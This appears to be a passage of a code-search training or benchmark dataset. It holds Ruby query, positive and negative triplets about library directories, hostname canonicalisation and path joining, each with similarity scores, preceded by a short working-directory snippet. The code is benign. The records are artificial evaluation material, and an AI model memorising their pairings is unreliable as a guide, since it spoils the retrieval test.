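def resolve_working_dir(run_mode, state_dir = Pathname.new('/var/lib/app'))
  if (env = ENV['PROJECT_WORKING_DIR'])
    Pathname.new(env)
  elsif run_mode == :daemon
    state_dir
  else
    Pathname.getwd
  end
end

# Extra path segments join onto the base the same way the original does,
# with reduce(:+) over Pathname objects.
base = resolve_working_dir(:daemon)
puts base + 'state' + 'app.db'   # => /var/lib/app/state/app.db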
Provide the absolute path to this Brewed's lib dir. | def libdir()
LIBDIR
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def lib_path; end",
"def lib_path; end",
"def lib_path; end",
"def _lib_dir\n File.join(get_pref(\"sketchbook.path\"), \"libraries\")\n end",
"def lib_dir\n LIB_DIR\n end",
"def lib_dir\n File.join(root, 'lib')\n end",
"def lib\n File.join(@root, 'lib')\n end",
"def path\n @backend.lib_dir + name_on_disk\n end",
"def lib\n File.join root, 'lib'\n end",
"def lib\n File.join root, 'lib'\n end",
"def lib_root\n File.expand_path(\"../..\", \"#{__FILE__}/lib\")\n end",
"def lib_root\n File.expand_path(\"../..\", \"#{__FILE__}/lib\")\n end",
"def libdir\n if brewed? || from_osx?\n if @min_version.major == 3\n prefix/\"lib/#{xy}/config-#{version.major}.#{version.minor}m\"\n else\n prefix/\"lib/#{xy}/config\"\n end\n else\n Pathname.new(`#{binary} -c \"from distutils import sysconfig; print(sysconfig.get_config_var('LIBPL'))\"`.strip)\n end\n end",
"def lib\n File.join root, 'lib'\n end",
"def lib_path\n File.join( solr_home, 'lib' )\n end",
"def library_path(library_name)\n Pathname.new(lib_dir) + library_name\n end",
"def dependent_library_dir(lib)\n File.join LIB_DIR, lib\n end",
"def library_path\n @library_path ||= nil\n end",
"def app_library_dir\n base_dir = app_sandbox_dir\n if base_dir.nil?\n nil\n else\n File.join(base_dir, 'Library')\n end\n end",
"def source_library_dir(lib)\n File.join base_dir, lib\n end",
"def lib_path=(_arg0); end",
"def lib_path=(_arg0); end",
"def lib_path=(_arg0); end",
"def location\n opts = get_options\n opts['lib']\n end",
"def libraryPath(sourcePath)\n\t'../evothings-libraries/' + sourcePath\nend",
"def component_libpath(cmp)\n vars = component_cmake_vars cmp\n libdir = vars.fetch('INSTALL_LIB_DIR', 'lib')\n File.join component_install_path(cmp), libdir\nend",
"def puppet_repl_lib_dir\n File.expand_path(File.join(File.dirname(File.dirname(File.dirname(__FILE__))), 'lib'))\n end",
"def install_dir(lib)\n if fr = ENV['FAKEROOT']\n return File.join(fr, lib)\n end\n\n lib\nend",
"def lib_out\n @mpc_project.recipe.get_relative_path(@mpc_project.lib_out)\n end",
"def libfile\n libfile = Pathname.new(resource[:lib]).absolute? ? resource[:lib] : \"modules/#{resource[:lib]}\"\n end",
"def default_loadpath\n ['lib']\n end",
"def applicationFilesDirectory\n file_manager = NSFileManager.defaultManager\n library_url = file_manager.URLsForDirectory(NSLibraryDirectory, inDomains:NSUserDomainMask).lastObject\n library_url.URLByAppendingPathComponent(\"Homebrew\")\n end",
"def libfile\n Pathname.new(resource[:lib]).absolute? ? resource[:lib] : \"modules/#{resource[:lib]}\"\n end",
"def sanitized_relative_darwin_lib_dir\n @sanitized_relative_darwin_lib_dir ||= File.join(\n File.dirname(relative_darwin_lib_dir),\n File.basename(relative_darwin_lib_dir).gsub('.', '_')\n )\n end",
"def sanitized_relative_darwin_lib_dir\n @sanitized_relative_darwin_lib_dir ||= File.join(\n File.dirname(relative_darwin_lib_dir),\n File.basename(relative_darwin_lib_dir).gsub('.', '_')\n )\n end",
"def lib_paths\n @mpc_project.recipe.get_relative_paths(@mpc_project.lib_paths)\n end",
"def library_path\n datastore['DLL']\n end",
"def files_dir\n return File.absolute_path(File.join(@root_dir, 'lib', 'files'))\n end",
"def project_path\n if(File.directory?(@library_path))\n # library is source dir\n File.join(project_lib, clean_name)\n else\n # library is a binary (like swc, jar, etc)\n File.join(project_lib, File.basename(@file_target.archive_path))\n end\n end",
"def bundled_path\n File.dirname Wisp::Source.bundled_path\n end",
"def rackup_path_from_rubylib\n env_path_separator = is_windows? ? ';' : ':'\n path_separator = Regexp.escape(File::ALT_SEPARATOR || File::SEPARATOR)\n needle = /#{path_separator}rack#{path_separator}/\n\n paths = ENV[\"RUBYLIB\"].to_s.split(env_path_separator)\n\n if rack_lib = paths.find{|path| path =~ needle }\n path = Pathname.new(rack_lib).parent.join(\"bin\").join(\"rackup\").expand_path\n path if path.file?\n end\n end",
"def additional_folders\n ['lib']\n end",
"def gem_r_lib\n File.expand_path(File.join(File.dirname(__FILE__), %w(.. r_lib)))\n end",
"def library_properties_path\n path + LIBRARY_PROPERTIES_FILE\n end",
"def lib\n\tDir.mkdir('lib')\nend",
"def path\n @path ||= [\".\", \"~/.statisticus\", gem_r_lib].map {|path| File.expand_path(path)}.delete_if {|path| not File.exist?(path)}\n end",
"def package_dir_path\n \"#{package_dir}/#{package_name}\"\n end",
"def hadoop_lib_dir\n if hdp22?\n \"/usr/hdp/#{hdp_version}\"\n else\n '/usr/lib'\n end\n end",
"def puppet_debugger_lib_dir\n File.expand_path(File.join(File.dirname(File.dirname(File.dirname(__FILE__))), 'lib'))\n end",
"def libpath( *args )\n rv = args.empty? ? LIBPATH : ::File.join(LIBPATH, args.flatten)\n if block_given?\n begin\n $LOAD_PATH.unshift LIBPATH\n rv = yield\n ensure\n $LOAD_PATH.shift\n end\n end\n return rv\n end",
"def libpath( *args )\n rv = args.empty? ? LIBPATH : ::File.join(LIBPATH, args.flatten)\n if block_given?\n begin\n $LOAD_PATH.unshift LIBPATH\n rv = yield\n ensure\n $LOAD_PATH.shift\n end\n end\n return rv\n end",
"def hadoop_lib_dir\n if hdp22?\n \"/usr/hdp/#{hdp_version}\"\n elsif iop?\n \"/usr/iop/#{node['hadoop']['distribution_version']}\"\n else\n '/usr/lib'\n end\n end",
"def PATH()\n $LOAD_MANAGER.PATH()\n end",
"def private_bin_dir\n return pretty_path(File.join(right_link_home_dir, 'bin'))\n end",
"def libpath( *args, &block )\n rv = args.empty? ? LIBPATH : ::File.join(LIBPATH, args.flatten)\n if block\n begin\n $LOAD_PATH.unshift LIBPATH\n rv = block.call\n ensure\n $LOAD_PATH.shift\n end\n end\n return rv\n end",
"def dir_base\n File.expand_path(File.dirname(__FILE__)+\"/../..\")\n end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def app_library_preferences_dir\n base_dir = app_library_dir\n if base_dir.nil?\n nil\n else\n File.join(base_dir, 'Preferences')\n end\n end",
"def install_dir # :nodoc:\n File.join Gem.dir, 'bundler', 'gems', \"#{@name}-#{dir_shortref}\"\n end",
"def my_path\n File.expand_path(File.dirname(__FILE__))\n end",
"def default_path\n Gem.default_path + [@home]\n end",
"def base_dir\n return Gem.dir unless loaded_from\n @base_dir ||= if default_gem? then\n File.dirname File.dirname File.dirname loaded_from\n else\n File.dirname File.dirname loaded_from\n end\n end",
"def bundle_dir\n File.expand_path(File.join(Bixby.repo_path, self.relative_path))\n end",
"def gem_root\n @@root\n end",
"def gem_dir\n directory = File.join(File.dirname(__FILE__), \"..\")\n File.expand_path(directory, File.dirname(__FILE__))\n end",
"def package_dir\n config.package_dir\n end",
"def applicationFilesDirectory\n file_manager = NSFileManager.defaultManager\n library_url = file_manager.URLsForDirectory(NSLibraryDirectory, inDomains:NSUserDomainMask).lastObject\n library_url.URLByAppendingPathComponent(\"Hubcap\")\n end",
"def gem_path\n File.expand_path(File.join(File.dirname(__FILE__), '..', '..'))\n end",
"def bin_dir\n @bin_dir ||= File.join gem_dir, bindir\n end",
"def lib(droplet)\n candidate = manifest_lib_dir(droplet)\n return candidate if candidate&.exist?\n\n candidate = boot_inf_lib_dir(droplet)\n return candidate if candidate&.exist?\n\n candidate = web_inf_lib_dir(droplet)\n return candidate if candidate&.exist?\n\n candidate = lib_dir(droplet)\n return candidate if candidate&.exist?\n\n raise 'No lib directory found'\n end",
"def lib_paths(lib_path = nil)\n @lib_paths.assign(lib_path) if lib_path\n @lib_paths\n end",
"def gem_root\n Pathname.new(__FILE__).dirname.parent.parent.expand_path\n end",
"def gem_dir\n @gem_dir ||= File.expand_path File.join(gems_dir, full_name)\n end",
"def package_dir\r\n \"${0%/#{target_name}}\"\r\n end",
"def abspath\n \"#{repo_base_path}/#{self.git_repo_path}\"\n end",
"def local_path\n check_and_copy_local_file_to_rails_public\n File.join('ajaxlibs', library_name, version, file_name)\n end",
"def lib_dirs(val = NULL)\n if null?(val)\n @lib_dirs || [windows_safe_path(\"#{install_dir}/embedded/lib\")]\n else\n @lib_dirs = val\n end\n end",
"def base_dir # :nodoc:\n File.join @root_dir, 'bundler'\n end",
"def mklib(path, home_path = true)\n \n if (home_path)\n lib = path + \"/lib\"\n else\n lib = path\n end\n \n $LOAD_PATH << lib\n \nend",
"def scripts_folder\n HOMEBREW_PREFIX/\"share/pypy#{abi_version}\"\n end",
"def absolute_db_path\n pn = Pathname.new(__FILE__)\n install_dir = pn.dirname.parent.parent.to_s + Pathname::SEPARATOR_LIST\n install_dir + @storage_location + @database_name\n end",
"def base_path\n Dir.pwd + \"/\"\n end",
"def lib_dirs_glob\n dirs = if self.raw_require_paths\n if self.raw_require_paths.size > 1\n \"{#{self.raw_require_paths.join(',')}}\"\n else\n self.raw_require_paths.first\n end\n else\n \"lib\" # default value for require_paths for bundler/inline\n end\n\n \"#{self.full_gem_path}/#{dirs}\".dup.tap(&Gem::UNTAINT)\n end",
"def basedir\n self.class._basedir\n end",
"def reference_directory\n @reference_directory ||= set_reference_directory\n end",
"def user_path\n load_path = $LOAD_PATH - ruby_library_locations\n load_path = load_path.reject{ |p| gem_paths.any?{ |g| p.start_with?(g) } }\n end",
"def lib\n @obj['lib']\n end",
"def actors_dir\n File.join(root_path, 'actors', 'lib')\n end",
"def relative_directory; end",
"def gem_dir\n if File.directory?(dir = File.join(working_dir, 'gems'))\n dir\n end\n end",
"def gem_dir\n if File.directory?(dir = File.join(working_dir, 'gems'))\n dir\n end\n end",
"def gem_path\n @path || downloaded_gem_path\n end",
"def project_lib\n if(library_path.index('.swc'))\n @project_lib ||= ProjectModel.instance.swc_dir\n else\n @project_lib ||= ProjectModel.instance.lib_dir\n end\n end",
"def dir_of(book_id)\n File.expand_path(LibraryLocator.identity(book_id).relpath, root)\n end"
] | [
"0.7990427",
"0.7990427",
"0.7990427",
"0.79743385",
"0.7927845",
"0.7907323",
"0.77938616",
"0.7615941",
"0.7605704",
"0.7605704",
"0.7589429",
"0.7589429",
"0.7515817",
"0.7508454",
"0.7396474",
"0.73448074",
"0.72190243",
"0.72182333",
"0.7168761",
"0.7134664",
"0.7123414",
"0.7123414",
"0.7123414",
"0.7091849",
"0.68335974",
"0.68297344",
"0.6826657",
"0.67938036",
"0.67724645",
"0.6745398",
"0.67441857",
"0.6628283",
"0.6578106",
"0.65761983",
"0.65761983",
"0.65280676",
"0.650653",
"0.6493036",
"0.64908594",
"0.6487169",
"0.6466802",
"0.64529335",
"0.6444142",
"0.6439845",
"0.64350903",
"0.6431174",
"0.64022404",
"0.6370016",
"0.6369875",
"0.6353616",
"0.6289966",
"0.62891483",
"0.6288392",
"0.6278814",
"0.6271686",
"0.62684226",
"0.6262435",
"0.6262435",
"0.6262435",
"0.6262435",
"0.6262435",
"0.6262435",
"0.6262435",
"0.62547106",
"0.6239759",
"0.62339145",
"0.6180892",
"0.61773103",
"0.61671644",
"0.61653554",
"0.6156007",
"0.61519647",
"0.6147482",
"0.61445546",
"0.6137922",
"0.61354434",
"0.60983145",
"0.6097641",
"0.6093235",
"0.6093066",
"0.6087558",
"0.60752386",
"0.6073309",
"0.6056657",
"0.6053082",
"0.6038149",
"0.60234725",
"0.6017282",
"0.6011149",
"0.60109997",
"0.60107726",
"0.6000738",
"0.60005116",
"0.5951825",
"0.59465533",
"0.5943867",
"0.5943867",
"0.5942994",
"0.59357506",
"0.5935098"
] | 0.79928905 | 0 |
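
A minimal, self-contained sketch of the accessor in the record above. The positive document simply returns a LIBDIR constant; the Brewed module name and the constant's definition below are illustrative assumptions, not taken from the record.

require 'pathname'

module Brewed
  # Assumed definition: an absolute Pathname anchored at this file's directory.
  LIBDIR = Pathname.new(__dir__)

  def self.libdir
    LIBDIR
  end
end

puts Brewed.libdir  # => absolute path to the lib directory
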
Returns the current host's name in canonical form (lowercase with domain information stripped). | def hostname()
unless @host.is_str?
@host = ENV['HOSTNAME']
@host = `/bin/hostname` unless @host.is_str?
raise "Failed to determine current HOSTNAME" unless @host.is_str?
@host = @host.downcase.sub(/\..*$/, '').strip
raise "Failed to determine current HOSTNAME" unless @host.is_str?
end
@host = @host.to_sym
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def canonical\n dns_host_name\n end",
"def canonical\n dns_name\n end",
"def canonicalize_hostname(hostname)\n Addrinfo.getaddrinfo(hostname, nil, nil, nil, nil, Socket::AI_CANONNAME).first.canonname\n end",
"def canonical_cname(cname)\n # DNS host names are case-insensitive. Trim trailing dot(s).\n cname &&= cname.downcase.sub(/\\.*\\Z/, '')\n cname\n end",
"def canonical_hostname(domain)\n # Allow hostname overrides\n return $override_dashboard if $override_dashboard && domain == 'studio.code.org'\n return $override_pegasus if $override_pegasus && domain == 'code.org'\n\n return \"#{name}.#{domain}\" if ['console', 'hoc-levels'].include?($node_name)\n return domain if $node_env == 'production'\n\n # our HTTPS wildcard certificate only supports *.code.org\n # 'env', 'studio.code.org' over https must resolve to 'env-studio.code.org' for non-prod environments\n sep = (domain.include?('.code.org')) ? '-' : '.'\n return \"localhost#{sep}#{domain}\" if $node_env == 'development'\n return \"translate#{sep}#{domain}\" if $node_name == 'crowdin'\n \"#{$node_env}#{sep}#{domain}\"\nend",
"def normalized_host\n # Remove trailing '.' characters\n host.sub(/\\.*$/, '').downcase if host\n end",
"def cname\n self[:cname] || domain_names&.first&.canonicalize_cname\n end",
"def cname\n self[:cname] || domain_names&.first&.canonicalize_cname\n end",
"def hostname\n Socket.gethostname.split('.').first.strip\n end",
"def hostname\n v = self.host\n v&.start_with?('[') && v.end_with?(']') ? v[1..-2] : v\n end",
"def hostname\n @hostname ||= `hostname`.strip\n end",
"def hostname\n @hostname ||= `hostname`.chomp\n end",
"def ssh_host_name( host )\n # This is included here for expected Space-wide policy settings.\n host[ :internet_name ] || host[ :internet_ip ] || host.name\n end",
"def get_server_hostname\n (`hostname`).strip\n end",
"def dns_host_name\n @dns_host_name ||= ::SimpleIDN.to_ascii(@host_name)\n end",
"def hostname\n if (host = @host.at('tag[name=host-fqdn]'))\n host.inner_text\n end\n end",
"def normalized_host; end",
"def fqdn\n exit_code, stdout = ssh.exec(\"hostname --fqdn\")\n (exit_code == 0) ? stdout.chomp : \"\"\n end",
"def fqdn\n ssh.exec!(\"hostname --fqdn\").chomp\n end",
"def hostname\n Socket.gethostname\n end",
"def hostname\n Socket.gethostname\n end",
"def hostname\n if resolution = CloudModel::AddressResolution.where(ip: ip).first\n resolution.name\n else\n begin\n Resolv.getname(ip)\n rescue\n ip\n end\n end\n end",
"def this_host_name\n if is_zz?\n return zz[:local_hostname]\n end\n\n return @this_host_name if @this_host_name != nil\n\n instances = ey['environment']['instances']\n # assume localhost if can't find\n @this_host_name = 'localhost'\n\n this_id = this_instance_id\n instances.each do |instance|\n if instance['id'] == this_id\n @this_host_name = instance['private_hostname']\n break\n end\n end\n @this_host_name\n end",
"def hostname\n protocol = request.headers['HTTP_X_FORWARDED_PROTO'] ||\n request.protocol ||\n 'http'\n protocol += '://' unless protocol.match?(%r{://})\n\n \"#{protocol}#{request.host}\"\n end",
"def hostname\n FFI::Libvirt.virConnectGetHostname(pointer)\n end",
"def hostname\n Socket.gethostname\n end",
"def hostname\n Resolv.getname(ip_address) rescue nil\n end",
"def normalize(domain)\n domain = domain.chomp(DOT).unicode_normalize(:nfc) unless domain.ascii_only?\n Punycode.encode_hostname(domain).downcase\n end",
"def public_dns_name\n data[:public_dns_name]\n end",
"def get_domain_name(host)\n domain = nil\n search = nil\n resolv_conf = if host['platform'].include?('windows')\n if host.is_cygwin?\n host.exec(Command.new(\"cat /cygdrive/c/Windows/System32/drivers/etc/hosts\")).stdout\n else\n host.exec(Command.new('type C:\\Windows\\System32\\drivers\\etc\\hosts')).stdout\n end\n else\n host.exec(Command.new(\"cat /etc/resolv.conf\")).stdout\n end\n resolv_conf.each_line do |line|\n if (match = /^\\s*domain\\s+(\\S+)/.match(line))\n domain = match[1]\n elsif (match = /^\\s*search\\s+(\\S+)/.match(line))\n search = match[1]\n end\n end\n return_value ||= domain\n return_value ||= search\n\n return unless return_value\n\n return_value.gsub(/\\.$/, '')\n end",
"def name\n ssh.exec!(\"hostname\").chomp\n end",
"def hostname\n ssh.exec!(\"hostname\").chomp\n end",
"def hostname\n hostname = nil\n run \"hostname\" do |channel, stream, data|\n hostname = data.chomp\n end\n hostname\n end",
"def dns_name\n [\"public\", fqdn].join(\".\")\n end",
"def ssh_hostname\n name = \"\"\n Net::SSH.start(@ip, \"pipeline\") do |ssh|\n name = ssh.exec! \"hostname -s\"\n end\n name.downcase.chomp\n end",
"def hostname\n return @hostname\n end",
"def domain\n unless @domain\n if defined? ActiveSupport::CoreExtensions::String::Inflections\n @domain = name.tableize\n else\n @domain = name.downcase\n end\n end\n @domain\n end",
"def get_public_hostname\n rpc_get_fact_direct('public_hostname')\n end",
"def hostname\n (request.env['HTTP_X_FORWARDED_SERVER'] =~ /[a-z]*/) ? request.env['HTTP_X_FORWARDED_SERVER'] : request.env['HTTP_HOST']\n end",
"def human_name\n Helpers.underscore(@name)\n end",
"def name\n if ipv4?\n \"[#{ip_address}]\"\n elsif ipv6?\n \"[IPv6:#{ip_address}]\"\n elsif @config[:host_encoding] && @config[:host_encoding] == :unicode\n ::SimpleIDN.to_unicode(host_name)\n else\n dns_name\n end\n end",
"def peer_hostname\n (error, name) = Cproton.pn_ssl_get_peer_hostname(@impl, 1024)\n raise SSLError.new if error < 0\n return name\n end",
"def current_company_name\n begin\n Client.find(current_subdomain).webname\n rescue\n \"\"\n end\n end",
"def determine_hostname\n @info[:hostname] = @shell.query('HOST', 'hostname')\n end",
"def name\n \"#{self[:host]}\"\n end",
"def fqdn(gear_name = nil)\n \"#{gear_name || canonical_name}-#{domain_namespace}.#{Rails.configuration.openshift[:domain_suffix]}\"\n end",
"def short\n return '' if name == domain.name\n return '' if name.blank?\n\n File.basename(name, \".#{domain.name}\")\n end",
"def host\n\t\t\t# FIXME: This is both a hack and the best way I know to do this.\n\t\t\tSocket.getaddrinfo(Socket.gethostname, 0)[0][2]\n\t\tend",
"def hostname\n @hostname ||= ENV['HOSTNAME'] || `hostname`.delete(\"\\n\")\n end",
"def get_server_domain\n @hostname ||= Socket.gethostname\n end",
"def clean_name\n global? ? registry.hostname : name\n end",
"def clean_name\n global? ? registry.hostname : name\n end",
"def domain_name\n @domain_name ||= default_name\n end",
"def hostname\n @hostname ||= ENV['HOSTNAME'] || `hostname`.chomp\n end",
"def hostname\n name + '.localhost'\n end",
"def themed_host_name\n map2tags.compact.join('-')\n end",
"def base_distinguished_name\n base_name = \"\"\n AD_DOMAIN.split('.').each do |item|\n base_name+=\"dc=#{item},\"\n end\n base_name.chop\n end",
"def host_as_string; end",
"def hostname\n return 'unknown' unless available?\n @hostname ||= ssh_cmd('hostname').chomp\n end",
"def hostname\n if @hostname.nil?\n @hostname = ENV[\"COMPUTERNAME\"]\n @hostname = ENV[\"HOSTNAME\"] if @hostname.blank?\n @hostname = `hostname` if @hostname.blank?\n @hostname = @hostname.gsub(/\\.terracotta\\.lan/, '').strip\n end\n \n @hostname\n end",
"def name\n n = self.class.name\n n.gsub!( /::/, '.' )\n n.gsub( /(\\w)\\w+\\./ ) { |m| $1.downcase + '.' }\n end",
"def build_domain_name(env)\n config = env[:machine].provider_config\n domain_name =\n if config.default_prefix.nil?\n env[:root_path].basename.to_s.dup.concat('_')\n elsif config.default_prefix.empty?\n # don't have any prefix, not even \"_\"\n String.new\n else\n config.default_prefix.to_s.dup\n end\n domain_name << env[:machine].name.to_s\n domain_name.gsub!(/[^-a-z0-9_\\.]/i, '')\n domain_name << \"_#{Time.now.utc.to_i}_#{SecureRandom.hex(10)}\" if config.random_hostname\n domain_name\n end",
"def get_hostname\n cmd_exec('uname -n').to_s\n rescue\n raise 'Unable to retrieve hostname'\n end",
"def get_fqdn\n return @resource[:name]\n end",
"def name\n @config.db_name.gsub(/@thismachinehostname@/, Socket.gethostname).\n gsub(/@prefix@/, prefix)\n end",
"def titleized\n self.uri.local_name.titleize\n end",
"def dns_name instance\n instance.dns_name\n end",
"def canonical\n if scientific_names.loaded?\n preferred_scientific_name&.canonical_form\n else\n scientific_names&.preferred&.first&.canonical_form\n end\n end",
"def public_hostname\n get_proxy.get_public_hostname\n end",
"def hostname(node)\n \"#{node.to_s}.smartengine.local\"\nend",
"def conform_name_to_shortname(name = nil)\n name ||= self.name\n name.to_s.downcase.strip.gsub(/[^a-z0-9]+/, \"-\").gsub(/^-|-$/, \"\")\n end",
"def conform_name_to_shortname(name = nil)\n name ||= self.name\n name.to_s.downcase.strip.gsub(/[^a-z0-9]+/, \"-\").gsub(/^-|-$/, \"\")\n end",
"def scheme_with_host(domain=nil)\n ['http://', domain || self.name, '/'].join(\"\")\n end",
"def conform_name_to_shortname(name = nil)\n name ||= self.name\n name.to_s.downcase.lstrip.rstrip.gsub(/[^a-z0-9]+/, '-').gsub(/^-|-$/,'')\n end",
"def conform_name_to_shortname(name = nil)\n name ||= self.name\n name.to_s.downcase.lstrip.rstrip.gsub(/[^a-z0-9]+/, '-').gsub(/^-|-$/,'')\n end",
"def titleized\n self.uri.local_name.titleize\n end",
"def name\n return @name unless @name.nil?\n \"#{@name_prefix}host:#{Socket.gethostname} pid:#{Process.pid}\" rescue \"#{@name_prefix}pid:#{Process.pid}\"\n end",
"def hostname\n host_hash['vmhostname'] || @name\n end",
"def common_name\n self[:CN]\n end",
"def base_hostname\n @username.match(/.com/) ? @username : \"#{@username}.tumblr.com\"\n end",
"def host\n attribute_part('subject', 'CN')\n end",
"def domain_name\n return @domain_name\n end",
"def domain_name\n return @domain_name\n end",
"def realname\r\n return for_context(nil, false) { |c| c.realname }\r\n end",
"def host\n Socket.gethostname\n end",
"def host\n Socket.gethostname\n end",
"def fqdn\n [ hostname, domain ].join('.') unless hostname.nil? and domain.nil?\n end",
"def namify\n self.name.split(\" \").map{|x| x.first.capitalize}[0..1].join(\"\")\n end",
"def canonical_name #:nodoc:\n if parent.nil?\n \"\"\n elsif parent.parent.nil?\n name\n else\n parent.canonical_name + \"[#{name}]\" \n end\n end",
"def fqdn\n [name, tag, domain].compact.join('.')\n end",
"def build_hostname\n hostname\n end",
"def hostname(ip_address)\n @resolver.getname(ip_address).to_s\n rescue\n 'IP address not found'\n end",
"def name\n camel = self.class.to_s.gsub(/.*::/, '')\n camel.gsub(/(\\S)([A-Z])/, '\\1_\\2').downcase\n end",
"def new_hostname\n host || incremented_hostname || local_host_name\n end",
"def simple_name\n name.split('::').last\n end",
"def simple_name\n name.split('::').last\n end",
"def name\n\t\tif name_source.present?\n\t\t\tproviders = [\"twitter\",\"facebook\",\"google_oauth2\",\"lastfm\",\"vimeo\"]\n\t\t\tp,v = name_source.split(\"::\",2)\n\t\t\treturn name_source unless p.in? providers\n\t\t\tl = self.links.find_by(provider: p)\n\t\t\tif l\n\t\t\t\tnames = l.names\n\t\t\t\treturn names[v.to_sym] if names.is_a? Hash and v and names[v.to_sym]\n\t\t\tend\n\t\tend\n\t\t\n\t\treturn custom_name if custom_name.present?\n\t\treturn email.split('@')[0].titleize if email.present?\n\t\tUser.default_name\n\tend",
"def fqdn\n \"#{to_label}.example.com\"\n end",
"def desired_hostname\n if path.start_with?('/foo/en')\n Rails.env.staging? ? 'foo-staging.infopark.com' : 'www.foo.com'\n else\n # Default hostname\n Rails.env.staging? ? 'website-staging.infopark.com' : 'www.website.com'\n end\n end",
"def common_name\n subject = %x{echo \"#{self.certificate}\" | openssl x509 -noout -subject}\n subject.gsub(/^(.*)CN=/, '').strip\n end"
] | [
"0.8175684",
"0.7700664",
"0.7595606",
"0.7432824",
"0.7319022",
"0.725847",
"0.7250591",
"0.7250591",
"0.72492355",
"0.7109443",
"0.7090248",
"0.6883639",
"0.6878133",
"0.6850288",
"0.68029255",
"0.6796222",
"0.67310333",
"0.6676832",
"0.66764206",
"0.6668549",
"0.6668549",
"0.6653275",
"0.6630305",
"0.6531664",
"0.6529798",
"0.65050757",
"0.65046287",
"0.6501656",
"0.64949745",
"0.6490035",
"0.64815974",
"0.6474123",
"0.6460769",
"0.64503264",
"0.64405",
"0.6437295",
"0.64338404",
"0.64242893",
"0.64137065",
"0.64121264",
"0.63966477",
"0.6388011",
"0.63480294",
"0.63399565",
"0.6330248",
"0.6313984",
"0.63130635",
"0.6310998",
"0.63075113",
"0.6299173",
"0.6296849",
"0.6296849",
"0.62944925",
"0.62934476",
"0.6291391",
"0.62827",
"0.6254267",
"0.62514156",
"0.6247521",
"0.62370735",
"0.62353754",
"0.621747",
"0.6215979",
"0.621459",
"0.62117594",
"0.61995834",
"0.6188141",
"0.6182316",
"0.618003",
"0.61690855",
"0.6166098",
"0.6166098",
"0.6157156",
"0.61558837",
"0.61558837",
"0.6149821",
"0.61423457",
"0.6138159",
"0.6124302",
"0.61171246",
"0.61078244",
"0.6106844",
"0.6106844",
"0.610097",
"0.60776657",
"0.60774946",
"0.6069672",
"0.6047396",
"0.6045986",
"0.6038102",
"0.601777",
"0.6000847",
"0.5999372",
"0.5999012",
"0.598806",
"0.598806",
"0.59720314",
"0.5966994",
"0.5966244",
"0.59635323"
] | 0.7147614 | 9 |
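
A sketch of the canonicalization performed by the hostname document above — lowercase, strip everything after the first dot, symbolize. This version assumes only the standard library; the record's is_str? helper is replaced with plain nil/empty checks.

require 'socket'

def canonical_hostname
  raw = ENV['HOSTNAME'] || Socket.gethostname
  raise 'Failed to determine current HOSTNAME' if raw.nil? || raw.strip.empty?
  # Lowercase, drop the domain part, trim whitespace, return a Symbol.
  raw.downcase.sub(/\..*$/, '').strip.to_sym
end

canonical_hostname  # e.g. "Web01.example.com" => :web01
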
Provide an absolute pathname within the current brewed's directory tree when given relative path components. | def path(*path)
[dir, *path].reduce(:+)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def absolute_path(path, reference = @pwd)\n path = File.expand_path(File.join(reference, path)) unless path.start_with? '/'\n path\n end",
"def relative_path_from(from); end",
"def abspath path\n if path[0] != '/'\n @homedir + '/' + path\n else\n path\n end\n end",
"def relative_path\n @relative_path ||= File.join(*[@dir, @name].map(&:to_s).reject(&:empty?)).delete_prefix(\"/\")\n end",
"def relative_path(from, to); end",
"def relative_to_absolute(path)\n if Pathname.new(path).absolute?\n Pathname.new(path)\n else\n Pathname.new(\"#{Pathname.pwd}/#{path}\")\n end\n end",
"def relative_path(*relative)\n Pathname.pwd.join(*(relative.flatten.map(&:to_s))).expand_path\n end",
"def absolute_path(path)\n path = Pathname.new(path)\n return Pathname.new(@config.base_path) + path unless path.absolute?\n path\n end",
"def absolutize_path(path = nil)\n \"#{root_path}#{path}\"\n end",
"def absolute_path(relative_path)\n quoted_string(File.expand_path(File.join(File.dirname(options[:filename]), relative_path.value)))\n end",
"def root_path(*args)\n relative = File.join(*args)\n return relative if relative.expand_path == relative\n root.expand_path / relative\n end",
"def root_path(*args)\n relative = File.join(*args)\n return relative if relative.expand_path == relative\n root.expand_path / relative\n end",
"def relative_path(path = @pwd, to = @root)\n Pathname.new(path).relative_path_from(Pathname.new(to)).to_s\n end",
"def absolute_uri_path(path)\n \"#{root_uri}#{path}\"\n end",
"def resolve_path(path)\n unless Pathname.new(path).absolute?\n File.join(Dir.pwd, path)\n else\n path\n end\nend",
"def resolve_path(path)\n unless Pathname.new(path).absolute?\n File.join(Dir.pwd, path)\n else\n path\n end\nend",
"def relative_directory\n return '' unless @directory_root\n @path - @directory_root - name\n end",
"def relative_path; end",
"def relative_path; end",
"def relative_path; end",
"def relative_path; end",
"def relative_path; end",
"def relative_path(path)\n path.split('/').drop(5).join('/')\nend",
"def relative_path\n @relative_path ||= PathManager.join(@dir, @name).delete_prefix(\"/\")\n end",
"def absolute_path(relative_path)\n if relative_path.start_with?(\"/\")\n relative_path\n else\n File.join(@@project_root, relative_path)\n end\n end",
"def resolve_relative_path(path, base_path)\n p = Pathname(base_path)\n p = p.dirname unless p.extname.empty?\n p += path\n\n p.cleanpath.to_s\n end",
"def abspath(file)\n File.absolute_path(file)\nend",
"def relative_path path, base\n (root? path) && (offset = descends_from? path, base) ? (path.slice offset, path.length) : path\n end",
"def resolvePath(possiblyRelativePath, rootDir)\n\t\tpath = Pathname.new(possiblyRelativePath)\n\t\tif(path.absolute?()) then\n\t\t\treturn path.to_s()\n\t\telse\n\t\t\trootPath = Pathname.new(rootDir)\n\t\t\treturn rootPath.join(path)\n\t\tend\n\tend",
"def relative_path\n self.path.sub(File.expand_path(options[:root_dir]) + '/', '')\n end",
"def relative_path\n @relative_path ||= File.join(@dir, @name)\n end",
"def qualify_path(path, root = @app_dir)\n \"$PWD/#{Pathname.new(path).relative_path_from(Pathname.new(root))}\"\n end",
"def getFullPath(relativePath)\n return baseDir + relativePath\n end",
"def abs_path_with(rel_path)\n path = abs_path\n return rel_path if path.nil?\n return \"#{path}.#{rel_path}\"\n end",
"def relative_path\n must_be File\n Pathname.new(self.full_path).relative_path_from(Pathname.new(Dir.pwd)).to_s\n end",
